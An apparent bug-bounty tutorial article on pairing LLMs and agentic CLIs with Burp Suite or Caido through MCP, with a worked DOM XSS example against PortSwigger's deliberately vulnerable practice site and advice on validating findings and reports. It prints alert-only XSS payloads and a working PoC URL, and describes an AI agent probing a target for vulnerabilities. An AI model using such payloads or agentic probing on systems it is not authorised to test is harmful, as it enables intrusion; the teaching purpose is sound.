How to hack with LLMs, agentic CLIs and MCP servers

Large language models (LLMs) are becoming an integral part of the Bug Bounty workflow. Used well, they help hunters analyse code, generate tooling, review proxy traffic, craft reports and move faster during active testing. Used poorly, they produce confident false positives and low-quality submissions.

This article covers where large language models add real leverage in AI-assisted vulnerability research, where they can mislead, and how pairing an agentic CLI with an MCP server turns a chat model into an invaluable part of your offensive security toolkit.

How LLMs are changing Bug Bounty workflows

LLMs are now a core tool for a growing number of hunters. Exploit code and custom tooling that once took hours to write can now be crafted in minutes. Serving as parallel research assistants during active engagements, LLMs can also help hunters summarise notes, review code paths, generate payload ideas and cover more attack surface, faster, than ever before.

However, your competitive advantage disappears if most other hunters probing your target are themselves using LLMs.

The qualities that truly give you an edge have not fundamentally changed: curiosity, domain expertise and the ability to think like an attacker. Accomplished hunters use AI to build more robust testing workflows and accelerate vulnerability discovery. Meanwhile, hunters lacking the expertise to interpret and validate model outputs are flooding platforms with false positives and low-quality AI-generated reports, also known as 'slop': script-kiddie behaviour at scale.

Using LLMs in Bug Bounty without false positives

The worst thing you can do is run an LLM with zero idea of what it is actually doing. If you point a model at a target, it flags a 'critical' finding and you submit it straight to the program, you have probably just reported a false positive.

Doing so wastes the time of triagers and every other hunter waiting in the queue. Platforms have become much stricter about raw LLM-generated reports, and repeated false positives can damage your reputation and potentially result in a platform ban.

The professional approach is simple: validate the finding yourself. Reproduce the issue from the LLM's output, confirm that it poses a real security risk and only then write the report.

Agentic CLIs and MCP Servers: The real leverage in LLM Bug Bounty hunting

Plenty of LLMs can help you hunt. Run one locally with Ollama or use a cloud model from Anthropic, OpenAI or Google. What matters more than which model you choose is how you drive it, what context you give it and how carefully you validate its output.

Agentic command-line tools let the model read your notes, edit files, run commands and integrate with the rest of your Bug Bounty toolkit through MCP. MCP, or Model Context Protocol, gives AI assistants a standard way to connect to external tools and data sources. In a Bug Bounty workflow, that means the model can work with your proxy, project files, notes and testing context instead of operating as a disconnected chat window.
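
Under the hood, MCP messages are JSON-RPC 2.0. As a rough sketch of what an agentic CLI sends when the model decides to use a proxy tool, the snippet below builds a tools/call request. The tool name get_proxy_history and its limit argument are hypothetical placeholders, not the actual tool names of any particular MCP server.

```javascript
// Build a JSON-RPC 2.0 request of the kind MCP clients send to call a tool.
// NOTE: the tool name and arguments used below are hypothetical examples.
function buildToolCall(id, toolName, args) {
  return {
    jsonrpc: "2.0",
    id,
    method: "tools/call",
    params: { name: toolName, arguments: args },
  };
}

const request = buildToolCall(1, "get_proxy_history", { limit: 20 });
console.log(JSON.stringify(request, null, 2));
```

The server replies with a result for the same id, which the CLI hands back to the model as context for its next step.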

The most popular agentic CLI tools are:

Claude Code from Anthropic

Gemini CLI from Google

Codex from OpenAI

An agentic CLI paired with an MCP server for your favourite proxy, whether it's Burp Suite, Caido or another tool, lets the model work inside the same environment as you. It can see your proxy history, follow your attack methods, help generate payload ideas and detect issues you may have missed.

That is where the real advantage of using LLMs in Bug Bounty lies: the model is not replacing you, it's a second set of eyes working alongside you.

Practical MCP Server setup for Burp Suite and Caido

The setup is straightforward: an agentic CLI driving an LLM, connected via MCP to your primary proxy.

For Burp Suite, PortSwigger publishes an MCP Server extension that exposes HTTP history and request replay to the model. For Caido, there is a community-built MCP server by c0tton-fluff, alongside Caido's own official agent skills.

With either tool wired up, the LLM operates inside your security testing environment as an assistant, not a black box.

For example, to connect Burp Suite's MCP server to Claude Code, create a .mcp.json file in your Bug Bounty working directory with the following config:

{
  "mcpServers": {
    "burpsuite": {
      "type": "sse",
      "url": "http://localhost:9876/"
    }
  }
}

Claude Code picks this up on startup and exposes Burp's HTTP history and request replay tools to the model. The same can be done from the command line: claude mcp add --transport sse burpsuite http://localhost:9876/.
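
A quick sanity check before launching the CLI can catch typos in the config. The following is a minimal sketch that checks only the shape used in the example above. The function name checkMcpConfig is introduced here for illustration, and its rules cover just the type and url fields shown in this article, not every option Claude Code may accept.

```javascript
// Check that a parsed .mcp.json has the shape used in the example above.
// Illustrative helper: it only knows about the "type" and "url" fields shown
// in this article, not every option the CLI may accept.
function checkMcpConfig(config) {
  const problems = [];
  const servers = config && config.mcpServers;
  if (!servers || typeof servers !== "object") {
    return ['missing top-level "mcpServers" object'];
  }
  for (const [name, server] of Object.entries(servers)) {
    if (!server || typeof server !== "object") {
      problems.push(`${name}: entry is not an object`);
      continue;
    }
    if (server.type !== "sse") {
      problems.push(`${name}: expected type "sse", got ${JSON.stringify(server.type)}`);
    }
    try {
      new URL(server.url); // throws a TypeError on a malformed URL
    } catch {
      problems.push(`${name}: invalid url ${JSON.stringify(server.url)}`);
    }
  }
  return problems;
}

const config = JSON.parse(`{
  "mcpServers": {
    "burpsuite": { "type": "sse", "url": "http://localhost:9876/" }
  }
}`);
console.log(checkMcpConfig(config)); // an empty array means no problems found
```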

If you prefer Caido, the Caido MCP plugin by c0tton-fluff exposes a similar bridge between the proxy and your agentic CLI. The setup steps differ slightly from Burp Suite's, so the official Caido MCP documentation is the recommended starting point.

LLM Bug Bounty Hunting in Practice: Why you always validate the PoC

To see an agentic CLI in action, we can run Claude Code alongside our manual testing on an intentionally vulnerable target. PortSwigger provides ginandjuice.shop, a deliberately vulnerable web application built to test vulnerability scanners and offensive security tooling.

It fits our purpose well: a controlled environment where we can compare what the LLM surfaces against what we find ourselves. This matters because a model may identify the right parameter, sink or vulnerability class, while still producing a proof of concept (PoC) that does not actually work.

Start Claude Code in your working directory and provide a focused prompt such as:

Your goal is to test the "search" GET parameter on "https://ginandjuice.shop/blog/?search=test" for vulnerabilities. Report any finding with the vulnerability class, payload, full PoC URL and clear verification steps.

We direct Claude Sonnet 4.6 to probe the parameter while we test in parallel through our proxy, guiding the model whenever we spot something it should look at more closely.

When Claude Code starts, it processes our prompt and begins enumerating the target.

While we run our own manual testing in parallel, Claude Code finishes its analysis and reports back a finding: a DOM-based XSS in the search GET parameter.

Verifying LLM Bug Bounty findings

Now comes the most important step. We must confirm this is a real vulnerability, not a hallucination or a reflected payload that never actually executes.

We start by testing the proof-of-concept link the model provided:

https://ginandjuice.shop/blog/?search="><img src=x onerror=alert(document.domain)>

If the payload fires, the vulnerability is legitimate and we can move on to writing the report. If it does not, we investigate the failure manually and feed that context back into the LLM to improve future testing accuracy.

Opening the link, we see that the payload never fires: the LLM gave us an invalid PoC. Submitting this report without verification could have resulted in an N/A closure and damaged our platform reputation.

Why manual PoC validation is critical

The next step is to understand why the proposed payload failed. The source code the LLM pointed to does look exploitable, so the LLM did its job. Now it's time to do ours: manual analysis, payload refinement and PoC validation.

We first locate the vulnerable code snippet in the client-side code:

<script>
function trackSearch(query) {
    document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
    trackSearch(query);
}
</script>

The code exists, and to an experienced eye it is clearly vulnerable to DOM XSS. So why did the LLM's PoC fail?

It failed because the application blocks payloads that introduce new HTML tags, which filtered out the model's <img> payload. The vulnerability is real, but the proof was not. Switching to an event-handler injection that reuses an existing tag works cleanly:

x" onload=alert(1) y="z
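
To see where each payload ends up in the page, it helps to replay the string concatenation from trackSearch outside the browser. The sketch below mirrors that concatenation only. buildTrackerMarkup is a name introduced here for illustration, and the code does not model the application's filter.

```javascript
// Mirror the string concatenation performed by trackSearch(), returning the
// markup instead of writing it to the document.
function buildTrackerMarkup(query) {
  return '<img src="/resources/images/tracker.gif?searchTerms=' + query + '">';
}

// The LLM's payload closes the tracker <img> and introduces a brand-new tag.
console.log(buildTrackerMarkup('"><img src=x onerror=alert(document.domain)>'));

// The refined payload closes only the src attribute, so the handler is added
// to the tracker <img> that the page already writes.
console.log(buildTrackerMarkup('x" onload=alert(1) y="z'));
```

The second call yields a single <img> tag whose src value ends at x, followed by an onload attribute and a harmless y attribute that absorbs the trailing quote. No new tag is introduced, which is consistent with the handler firing once the tracker image loads.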

Full working PoC URL:

https://ginandjuice.shop/blog/?search=x" onload=alert(1) y="z
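
The URL above contains raw spaces and quotes. Browsers generally tolerate these when the link is pasted into the address bar, but they may be mangled in a report or by command-line tools. One option, sketched here with the standard URL API, is to let the runtime percent-encode the payload and then confirm it decodes back to the same string the page's script will read.

```javascript
// Build a percent-encoded PoC URL from the raw payload using the WHATWG URL API.
const payload = 'x" onload=alert(1) y="z';
const pocUrl = new URL("https://ginandjuice.shop/blog/");
pocUrl.searchParams.set("search", payload);

console.log(pocUrl.href);

// Round-trip check: decoding the query the same way the page does should
// return the original payload unchanged.
const decoded = new URLSearchParams(pocUrl.search).get("search");
console.log(decoded === payload);
```

The encoded link should still be opened in a browser before it goes into a report, since encoding changes how the URL is written, not whether the exploit works.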

The LLM correctly identified the vulnerability but produced a payload that the application's filter rejected. This is exactly why manual PoC validation is non-negotiable in LLM-assisted Bug Bounty hunting: confirming the exploit yourself is the difference between a reproducible finding that earns a payout and a report closed as N/A.

Writing better Bug Bounty reports with LLMs

Treat report writing as seriously as the hacking itself. Once you've manually validated a finding, an LLM can help turn your notes into a clean, reproducible report.

But the final report still needs your eyes on it: verify that every payload, endpoint, request, response and impact claim matches your own testing.

Hitting 'submit' without that check risks an N/A closure and, if it becomes a habit, a platform ban.

The line between a credible LLM-assisted report and AI slop is simple: did you reproduce the vulnerability yourself, and does the report cover only what matters?

Every strong vulnerability report follows the same structure: description, steps to reproduce, proof of concept, and impact. Write the first draft yourself, using technical details from your own testing.
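
A cheap guard before a draft goes anywhere is to check that all four sections are present. The sketch below assumes each section of your draft starts with its name on a line of its own. The function name and that heading convention are illustrative, not a platform requirement.

```javascript
// Report the required sections that are missing from a plain-text draft.
// Assumes each section starts with its name on a line of its own.
const REQUIRED_SECTIONS = ["Description", "Steps to reproduce", "Proof of concept", "Impact"];

function missingSections(draft) {
  const lines = draft.split(/\r?\n/).map((line) => line.trim().toLowerCase());
  return REQUIRED_SECTIONS.filter((name) => !lines.includes(name.toLowerCase()));
}

// Illustrative draft that lacks a "Proof of concept" section.
const draft = [
  "Description",
  "DOM-based XSS in the search parameter of /blog/.",
  "Steps to reproduce",
  "1. Open the PoC URL in a browser.",
  "Impact",
  "Script execution on the affected origin.",
].join("\n");

console.log(missingSections(draft)); // [ 'Proof of concept' ]
```

A check like this only confirms the skeleton is there. Whether each section is accurate still depends on your own testing.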

Once the substance is there, an LLM is useful for fixing grammar, tightening the structure, and clarifying impact and reproduction steps. It should never write a report from scratch without your validated findings as input. We strongly recommend following our guide 'How to write an effective Bug Bounty report', which explains what a high-quality report looks like and how to structure one. You can also share that guide with the LLM so both you and the model work from the same reporting framework.

Why AI-generated reports get hunters banned

What you should never outsource to the model is the proof itself. The PoC must come from your own testing: your screenshots, your request and response pairs, your scripts, your video walkthrough of the exploit chain. Triagers can spot AI-generated filler quickly, and the report loses all credibility the moment they do.

How platforms are responding to AI-generated Bug Bounty reports

Triagers on all major Bug Bounty platforms are reporting a flood of low-quality reports bearing the hallmarks of careless AI use. The same LLM access that accelerates accomplished hunters has lowered the barrier for people who have no idea what they are submitting.

AI slop reports might look legit at first glance but contain fabricated vulnerabilities that LLMs have hallucinated. Platforms are responding with stricter validation requirements, heavier reputation weighting and serious penalties, including platform bans, for accounts that rack up too many N/A closures.

For experienced hunters, this is actually good news. When the floor drops, the signal from a quality report gets louder. A well-structured submission with a clear description of the vulnerability type, documented reproduction steps, and real security impact stands out more than ever.

Triagers remember the hunters who save them time. Your enhanced reputation will unlock private programs and your validation skills will help you bag the biggest bounties.
